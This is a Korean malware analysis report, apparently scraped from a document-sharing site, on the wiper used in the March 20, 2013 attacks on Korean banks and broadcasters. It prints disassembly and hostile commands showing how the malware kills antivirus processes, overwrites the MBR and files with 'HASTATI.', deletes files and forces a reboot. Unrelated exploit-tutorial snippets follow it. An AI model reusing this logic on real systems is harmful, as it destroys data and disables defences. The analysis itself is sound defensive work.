CKKeyPro 적용가이드
|
|
- 나라 빈
- 6 years ago
- Views:
Transcription
1 3.20 사이버테러악성코드분석보고서 라온시큐어보안기술연구팀 작성일 : 페이지 : 1/15
2 Introduction 2013년 3월 20일오후, MBC, KBS, YTN, 농협, 신한은행, 제주은행전산망장애가동시에발생하였다. 피해기관들의호스트약 500여대에오류메시지가화면에나타났으며악성코드에감염된호스트는사용할수없는상태가되었다. 현재까지정확한침투경로가밝혀지지않고있다. 이와같은전산망장애를유발한악성코드를수집하여분석하였다. 분석결과피해시스템에설치된악성코드크게다음과같은기능을포함하고있다. 악성코드설치시스템시간확인 APC(Ahnlab Policy Center) Agent 프로세스강제종료 바이로봇 ISMS 프로세스강제종료 피해시스템파일파괴 시스템부트로드파괴 시스템재부팅 악성코드는위와같은기능을통해일정시간 (2013년 3월 20일 14시 00분 ) 이되면프로세스를종료하고시스템의부팅영역과파일을파괴한다. 이와같은행위가끝나면악성코드는강제로시스템을재부팅하는코드를실행한다. 하지만악성코드가이미시스템부팅에필요한주요영역을파괴했기때문에시스템이정상적으로사용할수없는상태가된다. 본문서는앞서언급한악성코드에대한정적 & 동적분석결과를담고있으며이번사이버테러에해당하는전체악성코드에대한분석보고서는아님을미리밝혀둔다. 페이지 : 2/15
3 General Infromation 1. AmAgent.exe File Name File Size MD5 Created AmAgent.exe Bytes 5fcd6e1dace6b d913850f :39 PM 2. ApcRunCmd.exe File Name ApcRunCmd.exe File Size Bytes MD5 db4bbdc36a78a8807ad9b15a562515c4 Created - 페이지 : 3/15
4 Time Calculation & Comparison 악성코드는 GetLocalTime 함수를호출하여현재날짜와시간을구하고주어진연산을수행한다. 연산의결과를비교하여 2013년 3월 20일 14시 00분이후에는 MBR 영역을덮어쓰는코드를실행한다. 그리고 2013년 3월 20일 14시 00분이전에는 Sleep 함수를호출하여대기한다. Step1. GetLocalTime(EAX) GetLocalTime() 함수를호출하여현재시간정보를구한다 C7 8D45 F0 LEA EAX,DWORD PTR SS:[EBP-10] CA CB FF CALL DWORD PTR DS:[ESI+330] ; kernel32.getlocaltime Step2. Time Calculation & Comparison EDX = Min * (Hour * (Day * (Month + Year % 100 * 100))) EDI = * ( * ( * ( % 100 * 100))) = 0x4DAD ED 0FB745 F0 MOVZX EAX,WORD PTR SS:[EBP-10] ; EAX = Year F1 99 CDQ F2 6A 64 PUSH 64 ; 0x64 = F4 59 POP ECX ; ECX = F5 F7F9 IDIV ECX ; % F7 0FB745 F2 MOVZX EAX,WORD PTR SS:[EBP-E] ; EAX = Month FB 6BD2 64 IMUL EDX,EDX,64 ; * FE 03D0 ADD EDX,EAX; FB745 F6 MOVZX EAX,WORD PTR SS:[EBP-A] ; EAX = Day BD2 64 IMUL EDX,EDX,64 ; * D0 ADD EDX,EAX FB745 F8 MOVZX EAX,WORD PTR SS:[EBP-8] ; EAX = Hour D 6BD2 64 IMUL EDX,EDX,64 ; * D0 ADD EDX,EAX FB745 FA MOVZX EAX,WORD PTR SS:[EBP-6] ; EAX = Min BD2 64 IMUL EDX,EDX,64 ; * D0 ADD EDX,EAX B 3BD7 CMP EDX,EDI D 7C B9 JL SHORT AmAgent D8 페이지 : 4/15
5 Process Kill taskkill /F /IM pasvc.exe 와 taskkill /F /IM Clisvc.exe 를인자로받아 WinExec 호출하여 pasvc.exe와 Clisvc.exe 프로세스를 Kill한다. Step1. WinExec( taskkill /F /IM pasvc.exe, 0) taskkill 명령을통해 pasvc.exe 프로세스를강제로종료한다. 이때 /F 옵션은프로세스를강제 로종료하라는것을의미하며 /IM 은종료할프로세스의이미지를지정하는옵션이다. taskkill 명 령을통해종료하는 pasvc.exe 프로세스는 AhnLab Policy Agent를의미한다 A 00 PUSH D LEA EAX,DWORD PTR DS:[ESI+518] A 8DBE LEA EDI,DWORD PTR DS:[ESI+394] ; taskkill /F /IM pasvc.exe FF17 CALL DWORD PTR DS:[EDI] ; kernel32.winexec Step2. WinExec( taskkill /F /IM Clisvc.exe, 0) taskkill 명령을통해 Clisvc.exe 프로세스를강제로종료한다. 종료하는 Clisvc.exe는 Hauri의 ViRoboot ISMS를의미한다 A 00 PUSH C ADD ESI, B 56 PUSH ESI ; taskkill /F /IM Clisvc.exe C FF17 CALL DWORD PTR DS:[EDI] ; kernel32.winexec 페이지 : 5/15
6 MBR Overwrite 악성코드는 2013년 3월 20일 14시 00분이후에는 MBR 영역을 HASTATI. 이라는문자가반복되는문자열을생성하고 MBR 영역을덮어쓴다. 이로인해 MBR 영역이파괴되고이후재부팅하는코드실행으로인해시스템은정상적으로부팅할수없게된다. Step1. CreateFileA( \\.\PhysicalDrive0, 0xC , 3, NULL, 3, 0, NULL) MBR 영역으로의접근을위해 \\.\PhysicalDrive0 를인자로 CreateFileA() 함수를호출한다 DE2 57 PUSH EDI 00401DE3 57 PUSH EDI 00401DE4 6A 03 PUSH DE6 57 PUSH EDI 00401DE7 6A 03 PUSH DE C0 PUSH C DEE 8D85 F8FEFFFF LEA EAX,DWORD PTR SS:[EBP-108] 00401DF4 50 ; \\.\PhysicalDrive DF5 FF CALL DWORD PTR DS:[ESI+370] ; kernel32.createfilea Step2. memcpy(eax, eax, strlen(eax)) memcpy() 함수를호출하여 HASTATI. 문자열 * 60 복사 (0x1E0 size) 을메모리에복사한다 B POP EBX ; 0x3C D45 F4 LEA EAX,DWORD PTR SS:[EBP-C] FF96 AC CALL DWORD PTR DS:[ESI+3AC] ; msvcrt.strlen E F 8D45 F4 LEA EAX,DWORD PTR SS:[EBP-C] D843D F4FDFF LEA EAX,DWORD PTR SS:[EBP+EDI-20C] A B FF96 A CALL DWORD PTR DS:[ESI+3A8] ; msvcrt.memcpy D45 F4 LEA EAX,DWORD PTR SS:[EBP-C] FF96 AC CALL DWORD PTR DS:[ESI+3AC] ; msvcrt.strlen B 83C4 14 ADD ESP, E 03F8 ADD EDI,EAX 페이지 : 6/15
7 004020A0 4B A1 75 D1 DEC EBX JNZ SHORT AmAgent Step3. WriteFile(Handle, HASTATI. * 60, 0x200, EAX, NULL) SetFilePointer() 함수를호출하여 PhysicalDrive0의 0번째주소로이동하여 MBR 영역을가리키도 록한다. 그리고 WriteFile() 를호출하여 MBR 영역을 HASTATI. 라는문자열로덮어쓴다 E2 FF CALL DWORD PTR DS:[EDI+380] ; kernel32.setfilepointer E8 3BC6 CMP EAX,ESI EA JE SHORT AmAgent F EC 33C0 XOR EAX,EAX EE EB 1D JMP SHORT AmAgent D F0 6A 00 PUSH F2 8D45 FC LEA EAX,DWORD PTR SS:[EBP-4] F F PUSH FB FF75 10 PUSH DWORD PTR SS:[EBP+10] ; HASTATI.HASTATI FE FF77 40 PUSH DWORD PTR DS:[EDI+40] ; 0x FF CALL DWORD PTR DS:[EDI+374] ; kernel32.writefile 페이지 : 7/15
8 Shutdown 악성코드는 MBR 영역을덮어쓰고최종적으로시스템을 Shutdown 시키는코드를수행한다. Step1. Sleep(300000) Shutdown 코드를실행하기이전에 Sleep 함수를호출하며이때, Sleep 함수의인자로 0x493E0( Milliseconds) 를전달함으로써 PC 재부팅이전에잠시대기한다 E PUSH 493E FF CALL DWORD PTR DS:[ESI+334] ; kernel32.sleep F 56 PUSH ESI FF96 B CALL DWORD PTR DS:[ESI+2B0] ; Call step2 Step2. WinExec( shutdown r t 0, 0) WinExec 함수에 shutdown r t 0 을인자로넘겨악성코드에감염된 PC를재부팅한다. 이때 shutdown 명령어의인자로전달하는 r 옵션이 PC의재부팅을의미한다 B MOV EAX,DWORD PTR SS:[ESP+4] A 00 PUSH B 8D LEA ECX,DWORD PTR DS:[EAX+507] ; "shutdown -r -t 0" PUSH ECX FF CALL DWORD PTR DS:[EAX+394] ; kernel32.winexec C0 XOR EAX,EAX A 40 INC EAX B C3 RETN 페이지 : 8/15
9 File Overwrite 악성코드는 B:\ 드라이브부터순차적으로드라이브의타입을확인한다. 드라이브타입이 DRIVE_REMOVABLE 또는 DRIVE_FIXED일경우하위디렉토리를검색하고각파일의경로를추출한다. 추출한경로가시스템디렉토리, Program Files, ProgramData 인지확인한다. 이와같은경로에해당하지않는경우파일의일부분을 HASTATI. 라는문자열로덮어쓴다. 파일각각에대해덮어쓰는과정이끝나면파일을삭제한다. Step1. GetDriveType(EAX = DrivePathName) GetDriveType() 함수를호출할때, Root 디렉토리경로를인자로전달하여해당드라이브의타입 을판별한다. 드라이브의타입은 GetDriveType() 함수리턴값으로확인할수있으며리턴값의 범위는 0x00 ~ 0x06까지이다. 함수를호출할때, 인자로전달하는 Root 디렉토리경로는 B:\ 를 시작으로문자 B 에해당하는 ASCII Code 값을순차적으로증가시키면서 B(0x42):\ -> C(0x43):\ 순서로 GetDriveType() 함수의인자로전달한다 C 8D86 B504 LEA EAX,DWORD PTR DS:[ESI+4B5] ; EAX = "B:\" D45 F8 LEA EAX,DWORD PTR SS:[EBP-8] FF96 A403 CALL DWORD PTR DS:[ESI+3A4] ; msvcrt.strcpy("b:\", 0060FF80) D BF MOV EDI, PUSH EDI ; EDI = 0x D85 ECFD LEA EAX,DWORD PTR SS:[EBP-214] A 00 PUSH B C FF96 A003 CALL DWORD PTR DS:[ESI+3A0] ; msvcrt.memset(0060fd74, 0) A2 33DB XOR EBX,EBX A4 83C4 20 ADD ESP, A7 43 INC EBX A8 895E 0C MOV DWORD PTR DS:[ESI+C],EBX AB 895D 08 MOV DWORD PTR SS:[EBP+8],EBX AE E9 2B0100 JMP AmAgent DE B3 837D 08 1 CMP DWORD PTR SS:[EBP+8], B7 0F8D 3001 JGE AmAgent ED BD 8D45 F8 LEA EAX,DWORD PTR SS:[EBP-8] C0 50 ; EAX = Drive Path Name 페이지 : 9/15
10 004013C1 FF CALL DWORD PTR DS:[ESI+354] ; kernel32.getdrivetypea() Step2. Drive Type Comparison GetDriveTypeA() 함수의호출결과 0x3(DRIVE_FIXED) 인지 0x2(DRIVE_REMOVABLE) 인지비교한다 C7 83F8 03 CMP EAX,3 ; IF EAX = DRIVE_FIXED CA JE SHORT AmAgent D CC 83F8 02 CMP EAX,2 ; IF EAX = DRIVE_REMOVABLE CF 0F JNZ AmAgent D8 Step3. IF Not DRIVE_FIXED or Not DRIVE_REMOVABLE, Next Drive Path Name 드라이브타입이 DRIVE_FIXED 또는 DRIVE_REMOVABLE이아닌경우다음드라이브의타입확인 을위해 B:\ 중, B 의 ASCII 값을증가시킨다 D8 FE45 F8 INC BYTE PTR SS:[EBP-8] Next Drive(Ex. "B:\"->"C:\") DB FF45 08 INC DWORD PTR SS:[EBP+8] DE 0FBE45 F8 MOVSX EAX,BYTE PTR SS:[EBP-8] E2 3D CMP EAX, ; EAX = Drive Character E7^ 0F8C C6FE JL AmAgent B3 Step4. kernel32.findfirstfilea( C:\*.*, 0x0060FBFC) - File Search FindFirstFileA() 함수호출을통해드라이브내에있는파일을검색한다. 이때 FindFirstFileA() 함수 의인자로 C:\*.* 를전달함으로써 C:\ 아래에있는모든파일을검색하도록한다 FF75 0C PUSH DWORD PTR SS:[EBP+C] ; push "C:\" D86 BE04 LEA EAX,DWORD PTR DS:[ESI+4BE] E 50 ; EAX = "%s*.*" F 8D85 94F7 LEA EAX,DWORD PTR SS:[EBP-86C] A5 50 ; EAX = 0x00x0F4D A6 FF96 B403 CALL DWORD PTR DS:[ESI+3B4] ; msvcrt.sprintf(0x0060f4d8, "%s*.*", "C:\") AC 83C4 0C ADD ESP,0C AF 8D85 B8FE LEA EAX,DWORD PTR SS:[EBP-148] B B6 8D85 94F7 LEA EAX,DWORD PTR SS:[EBP-86C] BC BD 5C03 CALL DWORD PTR DS:[ESI+35C] ; kernel32.findfirstfilea("c:\*.*", 0x0060FBFC) Step5. Path String Generation1 페이지 : 10/15
11 파일검색과정에서파일의경로의비교를위해필요한문자열을생성한다 PUSH D85 A0F9 LEA EAX,DWORD PTR SS:[EBP-660] D 6A 00 PUSH F FF96 A003 CALL DWORD PTR DS:[ESI+3A0] FF75 0C PUSH DWORD PTR SS:[EBP+C] ; push "C:\" D85 A0F9 LEA EAX,DWORD PTR SS:[EBP-660] F 50 ; EAX = 0x0060F6E FF96 A403 CALL DWORD PTR DS:[ESI+3A4] ; msvcrt.strcpy(0x0060f6e4, "C:\") D85 E4FE LEA EAX,DWORD PTR SS:[EBP-11C] C 50 ; EAX = Path D 8D85 A0F9 LEA EAX,DWORD PTR SS:[EBP-660] ; EAX = "C:\" FF96 B003 CALL DWORD PTR DS:[ESI+3B0] ; msvcrt.strcat("c:\", Path) A 8D9E B904 LEA EBX,DWORD PTR DS:[ESI+4B9] D85 A0F9 LEA EAX,DWORD PTR SS:[EBP-660] PUSH EBX ; EBX = "\" ; EAX = "C:\" + Path FF96 B003 CALL DWORD PTR DS:[ESI+3B0] ; msvcrt.strcat("\", Path) Step6. Path String Generation2 또한검색하고있는경로가시스템경로인지또는 Program Files, ProgramData 인지비교하기 위해필요한문자열을생성한다. C:\Windows C:\Program Files C:\ProgramData BF 8D85 B4FD LEA EAX,DWORD PTR SS:[EBP-24C] C C6 FF CALL DWORD PTR DS:[ESI+360] ; kernel32.getwindowsdirectorya(0x0060faf8, 0x104) CC 8D85 B4FD LEA EAX,DWORD PTR SS:[EBP-24C] D2 53 PUSH EBX ; EBX = "\" D3 50 ; EAX = "C:\Windows" D4 FF96 B003> CALL DWORD PTR DS:[ESI+3B0] ; msvcrt.stract("c:\windows", "\") 페이지 : 11/15
12 004017DA 6A 03 PUSH DC 8D85 B4FD LEA EAX,DWORD PTR SS:[EBP-24C] E E3 8D85 B0FC LEA EAX,DWORD PTR SS:[EBP-350] E EA FF96 A803 CALL DWORD PTR DS:[ESI+3A8] ; msvcrt.memcpy(0x0060f9f4, "C:\Windows\", 3) F0 8D86 C404 LEA EAX,DWORD PTR DS:[ESI+4C4] F6 50 ; EAX = "Program Files" F7 8D85 B0FC LEA EAX,DWORD PTR SS:[EBP-350] FD 50 ; EAX = "C:\" FE FF96 B003 CALL DWORD PTR DS:[ESI+3B0] ; msvcrt.stract("c:\", "Program Files") D85 B0FC LEA EAX,DWORD PTR SS:[EBP-350] A 53 PUSH EBX ; EBX = "\" B 50 ; EAX = "C:\Program Files" C FF96 B003 CALL DWORD PTR DS:[ESI+3B0] ; msvcrt.stract("c:\program Files", "\") A 03 PUSH D85 B4FD LEA EAX,DWORD PTR SS:[EBP-24C] A 50 ; EAX = "C:\Windows" B 8D85 ACFB LEA EAX,DWORD PTR SS:[EBP-454] ; EAX = 0x0060F8F FF96 A803 CALL DWORD PTR DS:[ESI+3A8] ; msvcrt.memcpy(0x0060f8f0, "C:\Window", 3) D86 D204 LEA EAX,DWORD PTR DS:[ESI+4D2] E 50 ; EAX = "ProgramData" F 8D85 ACFB LEA EAX,DWORD PTR SS:[EBP-454] ; EAX = "C:\" FF96 B003 CALL DWORD PTR DS:[ESI+3B0] ; msvcrt.stract("c:\", "ProgramData") C 8D85 ACFB LEA EAX,DWORD PTR SS:[EBP-454] PUSH EBX ; EBX = "\" ; EAX = "C:\ProgramData" FF96 B003 CALL DWORD PTR DS:[ESI+3B0] ; msvcrt.stract("c:\programdtata", "\") Step7. Path Comparison 앞서생성한경로들을 strcmp 함수를통해비교한다. 페이지 : 12/15
13 D 8D85 B4FD LEA EAX,DWORD PTR SS:[EBP-24C] ; EAX = "C:\Windows\" D85 A0F9 LEA EAX,DWORD PTR SS:[EBP-660] A 50 ; EAX = Path B FF96 B803 CALL DWORD PTR DS:[ESI+3B8] ; msvcrt.strcmp("c:\windows\", Path) POP ECX POP ECX C0 TEST EAX,EAX F84 F200 JE AmAgent D B 8D85 B0FC LEA EAX,DWORD PTR SS:[EBP-350] ; EAX = "C:\Program Files\" D85 A0F9 LEA EAX,DWORD PTR SS:[EBP-660] ; EAX = Path FF96 B803 CALL DWORD PTR DS:[ESI+3B8] ; msvcrt.strcmp("c:\program Files", Path) F 59 POP ECX POP ECX C0 TEST EAX,EAX F84 D400 JE AmAgent D D85 ACFB LEA EAX,DWORD PTR SS:[EBP-454] F 50 ; EAX = "C:\ProgramData" D85 A0F9 LEA EAX,DWORD PTR SS:[EBP-660] ; EAX = Path FF96 B803 CALL DWORD PTR DS:[ESI+3B8] ; msvcrt.strcmp("c:\programdata", Path) Step8. FileOpen FindFirstFileA(), FindNextFileA() 함수호출을통해얻은파일이름을 CreateFile() 함수에인자로전달하여파일의 Handle을구한다. 이때, CreateFile() 함수에전달하는인자중 0xC 는 Read 와 Write가가능한상태로파일을오픈하는것을의미한다. 0xC : Generic read and generic write 3 : FILE_SHARE_READ, FILE_SHARE_WRITE lpsecurityattributes = 0 : NULL dwcreationdisposition = 3 : OPEN_EXISTING dwflagsandattributes = 0 : 0x0 htemplatefile = 0 : NULL 페이지 : 13/15
14 004019AF FF75 10 PUSH DWORD PTR SS:[EBP+10] ; push Filename B2 8D86 DE04 LEA EAX,DWORD PTR DS:[ESI+4DE] B8 FF75 0C PUSH DWORD PTR SS:[EBP+C] ; push Path BB 50 ; EAX = "%s%s" BC 8D85 ECFD LEA EAX,DWORD PTR SS:[EBP-214] C C3 FF96 B403 CALL DWORD PTR DS:[ESI+3B4] ; msvcrt.sprintf(0x0060e184, %s%s, Path, Name) C9 83C4 1C ADD ESP,1C CC 53 PUSH EBX ; EBX = CD 53 PUSH EBX CE 6A 03 PUSH D0 53 PUSH EBX D1 6A 03 PUSH D PUSH C D8 8D85 ECFD LEA EAX,DWORD PTR SS:[EBP-214] DE DF FF CALL DWORD PTR DS:[ESI+370] ; kernew32.createfilea(filepath, 0xC , 3, 0, 3, 0, 0) Step9. File Overwrite CreateFileA() 함수를통해구한파일 Handle을구하고 WriteFile() 함수를호출하여 Handle에해 당하는파일에 HASTATI. 문자열을 1023 바이트만큼덮어쓴다. WriteFile() 함수를통해덮어쓰 고난후, SetFilePoint() 함수를호출하여 File Pointer를 0x18F9C = 만큼이동하고다시 WriteFile() 를호출하여 HASTATI. 문자열을덮어쓰는과정을계속한다 A17 53 PUSH EBX ; EBX = 0x A18 8D45 F8 LEA EAX,DWORD PTR SS:[EBP-8] 00401A1B 50 ; EAX = 0x0060E A1C 57 PUSH EDI ; EDI = 0x3FF = A1D 8D85 E0F9 LEA EAX,DWORD PTR SS:[EBP-620] 00401A23 50 ; EAX = 0x0060DD78 = "HASTATI..." 00401A24 FF75 08 PUSH DWORD PTR SS:[EBP+8] ; FileHandle 00401A27 FF CALL DWORD PTR DS:[ESI+374] ; kernel32.writefile(filehandle, "HASTATI...", 0x3FF, 0x0060E390, 0x0)) 00401A37 6A 01 PUSH A39 53 PUSH EBX ; EBX = A3A 50 ; EAX = 0x00018F9C 페이지 : 14/15
15 00401A3B FF75 08 PUSH DWORD PTR SS:[EBP+8] ; FileHandle 00401A3E FF CALL DWORD PTR DS:[ESI+380] ; kernel32.setfilepointer(filehandle, 0x18F9C, 0, 1) Step10. File Delete 파일을덮어쓰는과정이끝나면 DeleteFileA() 함수를호출하여해당파일을삭제한다 A5B 8D85 ECFD LEA EAX,DWORD PTR SS:[EBP-214] 00401A61 50 ; EAX = FilePath 00401A62 FF96 7C03 CALL DWORD PTR DS:[ESI+37C] ; kernel32.deletefilea(filepath) 페이지 : 15/15
3.20 테러 악성코드바이너리분석 손충호 (StolenByte) WOWHACKER Group 해당문서는 WOWHACKER Group 의문서이므로, 무단도용및수 정및변조는할수없습니다. 페이지 1 / 20
3.20 테러 악성코드바이너리분석 손충호 (StolenByte) stolenbyte@wowhacker.org WOWHACKER Group 2013-03-20 해당문서는 WOWHACKER Group 의문서이므로, 무단도용및수 정및변조는할수없습니다. 페이지 1 / 20 전체적인공격프로세스 페이지 2 / 20 1. 바이너리가사용할 LoadLibrary 하여함수 Load
More informationDeok9_Exploit Technique
Exploit Technique CodeEngn Co-Administrator!!! and Team Sur3x5F Member Nick : Deok9 E-mail : DDeok9@gmail.com HomePage : http://deok9.sur3x5f.org Twitter :@DDeok9 > 1. Shell Code 2. Security
More informationTable of Contents 1. 분석 유포경로 악성파일분석 드롭퍼 A 분석 드롭퍼 B 분석 페이지 2 / 17
Trojan.KillDisk.MBR 악성코드분석보고서 (V 4.0) ESTsoft Corp. ALTOOLS Division Malware Research 페이지 1 / 17 Table of Contents 1. 분석...1 1-1. 유포경로... 2 1-2. 악성파일분석... 3 1-2-1. 드롭퍼 A 분석... 3 1-2-2. 드롭퍼 B 분석... 10 페이지
More information02.Create a shellcode that executes "/bin/sh" Excuse the ads! We need some help to keep our site up. List Create a shellcode that executes "/bin/sh" C
02.Create a shellcode that executes "/bin/sh" Excuse the ads! We need some help to keep our site up. List Create a shellcode that executes "/bin/sh" C language Assembly code Change permissions(seteuid())
More informationhlogin2
0x02. Stack Corruption off-limit Kernel Stack libc Heap BSS Data Code off-limit Kernel Kernel : OS Stack libc Heap BSS Data Code Stack : libc : Heap : BSS, Data : bss Code : off-limit Kernel Kernel : OS
More information제 9 도는 6제어항목의 세팅목표의 보기가 표시된 레이더 챠트(radar chart). 제 10 도는 제 6 도의 함수블럭(1C)에서 사용되는 각종 개성화 함수의 보기를 표시하는 테이블. 제 11a 도 제 11c 도까지는 각종 조건에 따라 제공되는 개성화함수의 변화의
(19) 대한민국특허청(KR) (12) 특허공보(B1) (51) Int. Cl. 5 B66B 1/18 (45) 공고일자 1993년09월28일 (11) 공고번호 특1993-0009339 (21) 출원번호 특1989-0002580 (65) 공개번호 특1989-0014358 (22) 출원일자 1989년03월02일 (43) 공개일자 1989년10월23일 (30) 우선권주장
More information10-2 삼각형의닮음조건 p270 AD BE C ABC DE ABC 중 2 비상 10, 11 단원도형의닮음 (& 활용 ) - 2 -
10 단원 : 도형의닮음 10-1 닮음도형 p265 ABC DEF ABC DEF EF B ABCD EFGH ABCD EFGH EF A AB GH ADFC CF KL 중 2 비상 10, 11 단원도형의닮음 (& 활용 ) - 1 - 10-2 삼각형의닮음조건 p270 AD BE C ABC DE ABC 중 2 비상 10, 11 단원도형의닮음 (& 활용 ) - 2 -
More informationMicrosoft PowerPoint - a10.ppt [호환 모드]
Structure Chapter 10: Structures t and Macros Structure 관련된변수들의그룹으로이루어진자료구조 template, pattern field structure를구성하는변수 (cf) C언어의 struct 프로그램의 structure 접근 entire structure 또는 individual fields Structure는
More information=
written by vangelis(vangelis@wowhacker.org) 0 0000 8 1000 1 0001 9 1001 2 0010 10 1010 3 0011 11 1011 4 0100 12 1100 5 0101 13 1101 6 0110 14 1110 7 0111 15 1111 110112 + 100012 = 1011002 110 0000 0101
More information(001~007)수능기적(적통)부속
0 6 06. C : k d=k+c k «+-, : «d= «± +C + =- : d=: ;[!; d=l +C : kf()d=k: f()d k : { f()+g()} d=: f()d+: g()d : { f()-g()} d=: f()d-: g()d : si d=-cos +C : cos d=si+c 008 : sec d=ta +C : cosec d=-cot +C
More informationHWP Document
CODE A00-B99 A00-A09 A00 KOR_TITLE 특정 감염성 및 기생충성 질환 창자 감염 질환 콜레라 A00.0 비브리오 콜레리 01 전형균에 의한 콜레라 A00.0 전형균에 의한 콜레라 A00.1 비브리오 콜레리 01 엘토르형균에 의한 콜레라 A00.1 엘토르형균에 의한 콜레라 A00.9 상세불명의 콜레라 A01 A01.0 장티푸스 장티푸스
More information<4D F736F F D20B9D9C0CCB7B5B9D9C0CCB7AFBDBA5FBCF6C1A42E646F63>
Virut 바이러스공격 ASEC 분석 1 팀고흥환선임연구원 해마다접수되는악성코드의통계를보면대부분이인터넷웜또는트로이목마가대부분을차지하며, 파일에기생하는바이러스는그수가적어지는것이추세이다. 그도그럴것이최근의악성코드특징은개인의능력과시가아닌돈과연관되는악성코드작성이대부분이기때문이다. 그렇다면 Virut 바이러스가인터넷웜과트로이목마를제치고국내뿐만아니라해외에서도큰피해를입히고있는이유가무엇인지,
More information(01-16)유형아작중1-2_스피드.ps
01 p.10 0001 000 61 0003 4 8 3 4 5 7 4 3 3 3 6 8 9 5 1 1 3 7 9 6 0 1 0004 4 0005 0006 3 0007 6 0008 30 0009 3 19 0010 10 ~14 14 ~18 9 18 ~1 11 1 ~16 4 16 ~0 4 30 0011 160 cm 170 cm 001 10 cm 5 0013 135
More informationCodegate Preliminary Match Repot
Codegate Preliminary Match Repot - 2008 Historymaker 소개글 Code gate - 2008 뭐알아서참고.. ㅡㅡ ;;; 목차 1 4 2012.06.15 20:19 ================================================================== / Codegate Preliminary
More informationMicrosoft Word - AntiCrackingTechnique.doc
Reverse Engineering Anti-Cracking Techniques 저자 : Nicolaous George (ishtus@astalavista.com) & Charalambous Glafkos (glafkos@astalavista.com) 편역 : Kancho ( kancholove@gmail.com ) 이문서는 www.milw0rm.com의 [papers]
More informationNo Slide Title
Copyright, 2017 Multimedia Lab., UOS 시스템프로그래밍 (Assembly Code and Calling Convention) Seong Jong Choi chois@uos.ac.kr Multimedia Lab. Dept. of Electrical and Computer Eng. University of Seoul Seoul, Korea
More information°ø±â¾Ð±â±â
20, 30, 40 20, 30, 40 1 2 3 4 5 6 7 8 9 10 3.1 6.3 9.4 12.6 15.7 18.8 22.0 25.1 28.3 31.4 2.4 4.7 7.1 9.4 11.8 14.1 16.5 18.8 21.2 23.6 7.1 14.1 21.2 28.3 35.3 42.4 49.5 56.5 63.6 70.7 5.9 11.9 17.8 23.7
More information슬라이드 1
Detecting Malicious code using Yara in Python Saint Security Dev Team 박건 0 소개 Introduction 박건 (Chris Park) 세인트시큐리티시스템개발팀 namegpark@gmail.com C#, C++, Python malwares.com 서비스개발 PULLer 서비스개발 (EXF) 1 목차 CONTENTS
More informationMicrosoft PowerPoint - chap07.ppt
2010-1학기 현대암호학 제Ⅱ부인증 박종혁 Tel: 970-6702 Email: jhpark1@snut.ac.kr 제7장일방향 해시 함수 목차 일방향 해시 함수 일방향 해시 함수의 응용 예 일방향 해시 함수의 예 일방향해시함수SHA-1 (512) 일방향 해시 함수로 해결할 수 없는 문제 7.0 주요 내용 범죄 수사에서는 지문을 이용하는 일이 있다. 특정인의
More informationINTRO Basic architecture of modern computers Basic and most used assembly instructions on x86 Installing an assembly compiler and RE tools Practice co
Basic reverse engineering on x86 This is for those who want to learn about basic reverse engineering on x86 (Feel free to use this, email me if you need a keynote version.) v0.1 SeungJin Beist Lee beist@grayhash.com
More informationPoison null byte Excuse the ads! We need some help to keep our site up. List 1 Conditions 2 Exploit plan 2.1 chunksize(p)!= prev_size (next_chunk(p) 3
Poison null byte Excuse the ads! We need some help to keep our site up. List 1 Conditions 2 Exploit plan 2.1 chunksize(p)!= prev_size (next_chunk(p) 3 Example 3.1 Files 3.2 Source code 3.3 Exploit flow
More information목 차 1. 개요 취약점분석추진배경 취약점요약 취약점정보 취약점대상시스템목록 분석 공격기법및기본개념 시나리오 공격코드
취약점분석보고서 [Aviosoft Digital TV Player Professional 1.x Stack Buffer Overflow] 2012-08-08 RedAlert Team 강동우 목 차 1. 개요... 1 1.1. 취약점분석추진배경... 1 1.2. 취약점요약... 1 1.3. 취약점정보... 1 1.4. 취약점대상시스템목록... 1 2. 분석...
More informationMicrosoft Word - Heap_Spray.doc
Heap Spray 본문서는 최근 웹 브라우저를 이용한 공격에 사용되는 Heap Spray 기법에 대한 내용을 수록하였다. 관련 내용에 대하여 많은 도움이 되기 바란다. 문서 내용은 초보자도 쉽게 이해할 수 있도록 관련 내용에 대한 설명을 포함하였다. Hacking Group OVERTIME force< forceteam01@gmail.com > 2007.05.13
More informationMicrosoft Word - Static analysis of Shellcode.doc
Static analysis of Shellcode By By Maarten Van Horenbeeck 2008.09.03 2008.09.03 본문서에서는악성코드에서사용하는난독화되어있는쉘코드 를분석하는방법에대한 Maarten Van Horenbeeck 의글을번역 한것이다. Hacking Group OVERTIME OVERTIME force
More information1 1,.,
,.,. 7 86 0 70 7 7 7 74 75 76 77 78 79 70 7 7 7 75 74 7 7 7 70 79 78 77 76 75 74 7.,. x, x A(x ), B(x ) x x AB =x -x A{x } B{x } x >x AB =x -x B{x } A{x } x =[ -x(xæ0) -x (x
More information2004math2(c).PDF
3 2004 1,,,, 2 1 1. LCD ( )? () ( ) 2. 100 () () 3. < > (1) (2) (3) ( ) < > < >(1)(3) < > (), (3)< >()? ()... () A. B. C. (3), A, B, A, B, C 4. (), () < >? < >? [2]..,.,,,,,...,,,,, 2 5. < > (1), (2) (3)
More informationMicrosoft Word - building the win32 shellcode 01.doc
Win32 Attack 1. Local Shellcode 작성방법 By 달고나 (Dalgona@wowhacker.org) Email: zinwon@gmail.com Abstract 이글은 MS Windows 환경에서 shellcode 를작성하는방법에대해서설명하고있다. Win32 는 *nix 환경과는사뭇다른 API 호출방식을사용하기때문에조금복잡하게둘러서 shellcode
More information슬라이드 1
파일 I/O 와디렉터리컨트롤 1 목차 기본적인파일처리 파일검색 파일열기 & 닫기 파일읽기 & 쓰기 삭제, 복사, 이동 (?) 파일의시간정보얻기 파일특성정보얻기 파일포인터 directory 생성 & 삭제 경로설정 경로얻기 2 파일생성 / 열기 HANDLE CreateFile ( LPCTSTR lpfilename, DWORD dwdesiredaccess, 파일이름
More information2004math2(a).PDF
3 2004 1..,,,..,. 2. 1.. 1.. LCD ( )? () ( ) 2. 100. () () 3... < > (1). (2). (3) ( ) < > < >(1)(3). < > (), (3)< >()? ()... () A.. B.. C.. (3), A, B, A, B, C 4. (), (). < >? < >? [2] ..,.,,,,,
More informationMicrosoft PowerPoint - a6.ppt [호환 모드]
이장의내용 6 장조건부처리 부울과비교명령어 조건부점프 조건부루프명령어 조건부구조 컴퓨터정보통신 어셈블리언어 2 6.2 부울과비교명령어 부울명령어 Instructions ti 동작 AND dst, src OR dst, src XOR dst, src NOT dst dst dst AND src dst dst OR src dst dst XOR src dst NOT
More informationMicrosoft Word - Dropper.Agent D.doc
